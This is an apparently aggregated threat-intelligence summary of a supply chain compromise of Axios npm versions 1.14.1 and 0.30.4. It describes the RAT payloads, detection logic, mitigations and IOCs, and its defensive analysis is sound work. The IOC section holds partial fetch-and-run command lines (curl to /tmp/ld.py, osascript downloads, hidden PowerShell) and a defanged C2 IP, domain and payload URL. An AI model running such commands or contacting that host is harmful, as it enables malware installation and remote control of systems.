Skip to content
.ca
sign in
6 mincritical

Elastic releases detections for the Axios supply chain compromise

A critical supply chain attack compromised the popular Axios npm package, utilizing a malicious transitive dependency to execute cross-platform payloads during installation. The attack targets Linux, Windows, and macOS systems, deploying OS-specific Remote Access Trojans (RATs) capable of host profiling, command execution, and follow-on payload delivery. Detection engineering efforts should focus on anomalous process ancestry, such as Node.js spawning native OS shells to retrieve and background remote payloads.

Sens:ImmediateConf:highAnalyzed:2026-03-31reports

Authors: Elastic Security Labs

ActorsAxios supply-chain compromise
AxiosnpmSupply ChainRATCross-Platform

Source:Elastic Security Labs

IOCs · 4

Key Takeaways

  • Malicious Axios npm packages (versions 1.14.1 and 0.30.4) deliver cross-platform payloads via a transitive dependency named plain-crypto-js.
  • The attack triggers during 'npm install' via a postinstall script, spawning OS-native shells to fetch remote payloads.
  • The payloads deploy OS-specific Remote Access Trojans (RATs): a Python RAT for Linux, a PowerShell RAT for Windows, and a custom Mach-O backdoor for macOS.
  • Detection is most reliable by monitoring process ancestry, specifically Node.js spawning shells or download utilities, followed by detached execution.

Affected Systems

  • Linux
  • Windows
  • macOS
  • Node.js environments

Attack Chain

The attack begins when a developer installs a compromised version of the Axios npm package, which pulls in a malicious transitive dependency (plain-crypto-js). During installation, a postinstall script triggers OS-native execution (using sh, cscript, or osascript) to download a second-stage payload. The payload is then executed in a detached or hidden context, deploying an OS-specific Remote Access Trojan (RAT). These RATs establish persistence, profile the host, and beacon to a C2 server for further tasking, such as arbitrary command execution or in-memory payload injection.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: Yes
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No
  • Platforms: Elastic Security

Elastic provides behavioral detection rules focusing on process ancestry, such as Node.js spawning curl/wget, renamed binary proxies, and suspicious registry modifications.

Detection Engineering Assessment

EDR Visibility: High — The attack relies heavily on anomalous process ancestry (Node.js spawning shells) and OS-native execution which are highly visible in EDR telemetry. Network Visibility: Medium — Network connections to unknown IPs/domains via curl/wget are visible, but the traffic itself may blend in if not inspecting User-Agents or specific POST bodies. Detection Difficulty: Moderate — While the initial execution is noisy (Node.js spawning curl), the payloads use renamed binaries, in-memory execution, and masquerading to evade static detections.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon Event ID 1)
  • Registry Events (Sysmon Event ID 12/13)
  • File Creation (Sysmon Event ID 11)
  • PowerShell Script Block Logging (Event ID 4104)

Hunting Hypotheses

HypothesisTelemetryATT&CK StageFP Risk
Look for Node.js or related package manager processes spawning OS-native shells or download utilities like curl and wget.Process CreationExecutionMedium
Search for shell processes executing with arguments that background the process (e.g., using nohup and &) immediately after a download.Process CreationExecutionLow
Identify execution of signed system binaries (like PowerShell) from unexpected directories such as C:\ProgramData.Process CreationDefense EvasionLow
Monitor for suspicious child processes spawned by macOS XPC services or binaries with invalid code signatures mimicking Apple naming conventions.Process CreationExecutionLow

Control Gaps

  • Static AV signatures (payloads are downloaded dynamically and executed in memory or backgrounded)

Key Behavioral Indicators

  • Node.js spawning curl/wget
  • Renamed powershell.exe (wt.exe) in C:\ProgramData
  • osascript downloading payloads to /Library/Caches
  • Fake IE8 User-Agent string

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Identify and remove any installations of Axios versions 1.14.1 and 0.30.4.
  • Block the identified C2 IP (142.11.206.73) and domain (sfrclak.com) at the perimeter.
  • Search endpoint telemetry for the provided file hashes and anomalous Node.js process ancestry.

Infrastructure Hardening

  • Implement egress filtering to restrict servers from downloading arbitrary executables via curl/wget.
  • Enforce strict execution policies to prevent binaries from running out of C:\ProgramData or /tmp.

User Protection

  • Ensure EDR is deployed and configured to monitor script block logging and process ancestry.
  • Restrict developer environments from installing unverified or newly published npm packages without scanning.

Security Awareness

  • Educate developers on the risks of supply chain attacks and the importance of verifying package dependencies and versions.

MITRE ATT&CK Mapping

  • T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
  • T1059.004 - Command and Scripting Interpreter: Unix Shell
  • T1059.001 - Command and Scripting Interpreter: PowerShell
  • T1059.002 - Command and Scripting Interpreter: AppleScript
  • T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1036.003 - Masquerading: Rename System Utilities
  • T1055.012 - Process Injection: Process Hollowing
  • T1105 - Ingress Tool Transfer
  • T1564.001 - Hide Artifacts: Hidden Files and Directories

Additional IOCs

  • Ips:
    • 142[.]11[.]206[[.]]73 - C2 IP address
  • Domains:
    • sfrclak[[.]]com - C2 Domain
  • Urls:
    • hxxp://sfrclak[[.]]com:8000/6202033 - C2 payload hosting URL
  • File Hashes:
    • 6483c004e207137385f480909d6edecf1b699087378aa91745ecba7c3394f9d7 (sha256) - /tmp/ld.py (Linux Python RAT second stage)
    • ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c (sha256) - 6202033.ps1 (Windows PowerShell payload)
    • e49c2732fb9861548208a78e72996b9c3c470b6b562576924bcc3a9fb75bf9ff (sha256) - system.bat (Windows persistence launcher)
  • Registry Keys:
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate - Windows persistence key used to execute system.bat
  • File Paths:
    • */node_modules/plain-crypto-js/setup.js - Node.js first-stage dropper
    • /tmp/ld.py - Linux Python RAT second stage
    • C:\ProgramData\wt.exe - Windows renamed powershell.exe used as an execution proxy
    • C:\ProgramData\system.bat - Windows persistence launcher
    • /Library/Caches/com.apple.act.mond - macOS Mach-O backdoor payload
    • /tmp/*.scpt - macOS temporary AppleScript launcher
  • Command Lines:
    • Purpose: Linux payload retrieval and execution | Tools: sh, curl, nohup, python3 | Stage: Execution | sh -c curl -o /tmp/ld.py
    • Purpose: macOS payload retrieval and execution | Tools: osascript, curl, zsh | Stage: Execution | do shell script "curl -o /Library/Caches/com.apple.act.mond
    • Purpose: Windows in-memory payload execution | Tools: powershell, Invoke-WebRequest | Stage: Execution | start /min powershell -w h -c
  • Other:
    • axios 1.14.1 - Malicious npm package
    • axios 0.30.4 - Malicious npm package
    • plain-crypto-js 4.2.1 - Malicious transitive dependency
    • mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0) - Malicious User-Agent string used by the RATs
    • packages[.]npm[.]org/product0 - macOS POST body
    • packages[.]npm[.]org/product1 - Windows POST body
    • packages[.]npm[.]org/product2 - Linux POST body

Related